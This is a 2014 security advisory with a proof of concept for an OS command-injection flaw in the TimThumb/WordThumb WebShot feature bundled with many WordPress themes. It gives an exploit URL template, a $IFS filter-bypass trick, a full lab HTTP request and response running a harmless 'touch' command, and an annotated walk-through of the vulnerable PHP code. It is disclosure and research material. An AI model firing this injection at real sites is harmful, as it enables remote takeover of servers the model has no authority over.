[+] Wordpress 0day TimThumb 2.8.13 Remote Code Execution [+]

1. ######################################################################
2. # _ ___ _ _ ____ ____ _ _____
3. # | | / _ \| \ | |/ ___|/ ___| / \|_ _|
4. # | | | | | | \| | | _| | / _ \ | |
5. # | |__| |_| | |\ | |_| | |___ / ___ \| |
6. # |_____\___/|_| \_|\____|\____/_/ \_\_|
7. #
8. # Wordpress TimThumb 2.8.13 WebShot Remote Code Execution (0-day)
9. # Affected website : a lot Wordpress Themes, Plugins, 3rd party components
10. # Release dates : June 24, 2014
11. #
12. # Special Thanks to 2600 Thailand group
13. # : Xelenonz, anidear, windows98se, icheernoom, w4x0r, pistachio
14. # https://www.facebook.com/groups/2600Thailand/ , http://2600.in.th/
15. #
16. ########################################################################
17.  
18. [+] Description
19. ============================================================
20. TimThumb is a small php script for cropping, zooming and resizing web
21. images (jpg, png, gif). Perfect for use on blogs and other applications.
22. Developed for use in the WordPress theme Mimbo Pro, and since used in many
23. other WordPress themes.
24.  
25. http://www.binarymoon.co.uk/projects/timthumb/
26. https://code.google.com/p/timthumb/
27.  
28. The original project WordThumb 1.07 also vulnerable (
29. https://code.google.com/p/wordthumb/)
30. They both shared exactly the same WebShot code! And there are several
31. projects that shipped with "timthumb.php", such as,
32. Wordpress Gallery Plugin
33. https://wordpress.org/plugins/wordpress-gallery-plugin/
34. IGIT Posts Slider Widget
35. http://wordpress.org/plugins/igit-posts-slider-widget/
36.  
37. All themes from http://themify.me/ contains vulnerable "wordthumb" in
38. "<theme-name>/themify/img.php".
39.  
40. [+] Exploit
41. ============================================================
42. http://
43. <wp-website>/wp-content/themes/<wp-theme>/path/to/timthumb.php?webshot=1&src=http://
44. <wp-website>$(<os-cmds>)
45.  
46. ** Note that OS commands payload MUST be within following character sets:
47. [A-Za-z0-9\-\.\_\~:\/\?\#\[\]\ () \!\$\&\'\(\)\*\+\,\;\=]
48.  
49. ** Spaces, Pipe, GT sign are not allowed.
50. ** This WebShot feature is DISABLED by default.
51. ** CutyCapt and XVFB must be installed in constants.
52.  
53. [+] Proof-of-Concept
54. ============================================================
55. There are couple techniques that can be used to bypass limited charsets but
56. I will use a shell variable $IFS insteads of space in this scenario.
57.  
58. PoC Environment:
59. Ubuntu 14.04 LTS
60. PHP 5.5.9
61. Wordpress 3.9.1
62. Themify Parallax Theme 1.5.2
63. WordThumb 1.07
64.  
65. Crafted Exploit:
66. http://loncatlab.local/wp-content/themes/parallax/themify/img.php?webshot=1&src=http://loncatlab.local/$(touch$IFS/tmp/longcat)
67.  
68. GET /wp-content/themes/parallax/themify/img.php?webshot=1&src=
69. http://longcatlab.local/$(touch$IFS/tmp/longcat) HTTP/1.1
70. Host: longcatlab.local
71. Proxy-Connection: keep-alive
72. Cache-Control: max-age=0
73. Accept:
74. text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
75. User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like
76. Gecko) Chrome/35.0.1916.153 Safari/537.36
77. Accept-Encoding: gzip,deflate,sdch
78. Accept-Language: en-US,en;q=0.8
79. Cookie: woocommerce_recently_viewed=9%7C12%7C16;
80. wp-settings-1=libraryContent%3Dbrowse%26editor%3Dtinymce;
81. wp-settings-time-1=1403504538; themify-builder-tabs=query-portfoliot;
82. wordpress_test_cookie=WP+Cookie+check;
83. wordpress_logged_in_26775808be2a17b15cf43dfee3a681c9=moderator%7C1403747599%7C62244ce3918e23df1bd22450b3d78685
84.  
85. HTTP/1.1 400 Bad Request
86. Date: Tue, 24 Jun 2014 07:20:48 GMT
87. Server: Apache
88. X-Powered-By: PHP/5.5.9-1ubuntu4
89. X-Content-Type-Options: nosniff
90. X-Frame-Options: sameorigin
91. Content-Length: 3059
92. Connection: close
93. Content-Type: text/html
94.  
95. …
96. <a href='http://www.php.net/function.getimagesize&apos;
97. target='_new'>getimagesize</a>
98. ( )</td><td
99. title='/var/www/longcatlab.local/public_html/wp-content/themes/parallax/themify/img.php'
100. bgcolor='#eeeeec'>../img.php<b>:</b>388</td></tr>
101. </table></font>
102. <h1>A WordThumb error has occured</h1>The following error(s) occured:<br
103. /><ul><li>The image being resized is not a valid gif, jpg or
104. png.</li></ul><br /><br />Query String : webshot=1&amp;src=
105. http://longcatlab.local/$(touch$IFS/tmp/longcat)<br />WordThumb version :
106. 1.07</pre>
107.  
108. Even it response with error messages but injected OS command has already
109. been executed.
110.  
111. $ ls /tmp/longcat -lha
112. - -rw-r--r-- 1 www-data www-data 0 มิ.ย. 24 14:20 /tmp/longcat
113.  
114.  
115. [+] Vulnerability Analysis
116. ============================================================
117. https://timthumb.googlecode.com/svn/trunk/timthumb.php
118.  
119. Filename: timthumb.php
120.  
121. if(! defined('WEBSHOT_ENABLED') ) define ('WEBSHOT_ENABLED', true);
122. if(! defined('WEBSHOT_CUTYCAPT') ) define ('WEBSHOT_CUTYCAPT',
123. '/usr/local/bin/CutyCapt');
124. if(! defined('WEBSHOT_XVFB') ) define ('WEBSHOT_XVFB', '/usr/bin/xvfb-run');
125. ...
126. timthumb::start(); ← start script
127. ...
128. public static function start(){
129. $tim = new timthumb(); ← create timthumb object, call __construct()
130. ...
131. $tim->run();
132. ...
133. public function __construct(){
134. ...
135. $this->src = $this->param('src'); ← set "src" variable to HTTP GET "src"
136. parameter
137. …
138. if(preg_match('/^https?:\/\/[^\/]+/i', $this->src)){
139. ...
140. $this->isURL = true; ← prefix http/s result in isURL = true
141. }
142. ...
143.  
144. protected function param($property, $default = ''){
145. if (isset ($_GET[$property])) {
146. return $_GET[$property];
147. ...
148.  
149. public function run(){
150. if($this->isURL){
151. ...
152. if($this->param('webshot')){ ← HTTP GET "webshot" must submitted
153. if(WEBSHOT_ENABLED){ ← this pre-defined constant must be true
154. ...
155. $this->serveWebshot(); ← call webshot feature
156. } else {
157. ...
158.  
159. protected function serveWebshot(){
160. ...
161. if(! is_file(WEBSHOT_CUTYCAPT)){ ← check existing of cutycapt
162. return $this->error("CutyCapt is not installed. $instr");
163. }
164. if(! is_file(WEBSHOT_XVFB)){ ← check existing of xvfb
165. return $this->Error("Xvfb is not installed. $instr");
166. }
167. ...
168. $url = $this->src;
169. if(! preg_match('/^https?:\/\/[a-zA-Z0-9\.\-]+/i', $url)){ ← check valid
170. URL #LoL
171. return $this->error("Invalid URL supplied.");
172. }
173. $url =
174. preg_replace('/[^A-Za-z0-9\-\.\_\~:\/\?\#\[\]\ () \!\$\&\'\(\)\*\+\,\;\=]+/',
175. '', $url); ← check valid URL as specified in RFC 3986
176. http://www.ietf.org/rfc/rfc3986.txt
177. ...
178. if(WEBSHOT_XVFB_RUNNING){
179. putenv('DISPLAY=:100.0');
180. $command = "$cuty $proxy --max-wait=$timeout --user-agent=\"$ua\"
181. --javascript=$jsOn --java=$javaOn --plugins=$pluginsOn
182. --js-can-open-windows=off --url=\"$url\" --out-format=$format
183. --out=$tempfile"; ← OS shell command injection
184. } else {
185. $command = "$xv --server-args=\"-screen 0,
186. {$screenX}x{$screenY}x{$colDepth}\" $cuty $proxy --max-wait=$timeout
187. --user-agent=\"$ua\" --javascript=$jsOn --java=$javaOn --plugins=$pluginsOn
188. --js-can-open-windows=off --url=\"$url\" --out-format=$format
189. --out=$tempfile"; ← OS shell command injection
190. }
191. ...
192. $out = `$command`; ← execute $command as shell command
193.  
194. "PHP supports one execution operator: backticks (``). Note that these are
195. not single-quotes! PHP will attempt to execute the contents of the
196. backticks as a shell command." -
197. http://www.php.net//manual/en/language.operators.execution.php
198.  
199. "$url" is failed to escape "$()" in "$command" which is result in arbitrary
200. code execution.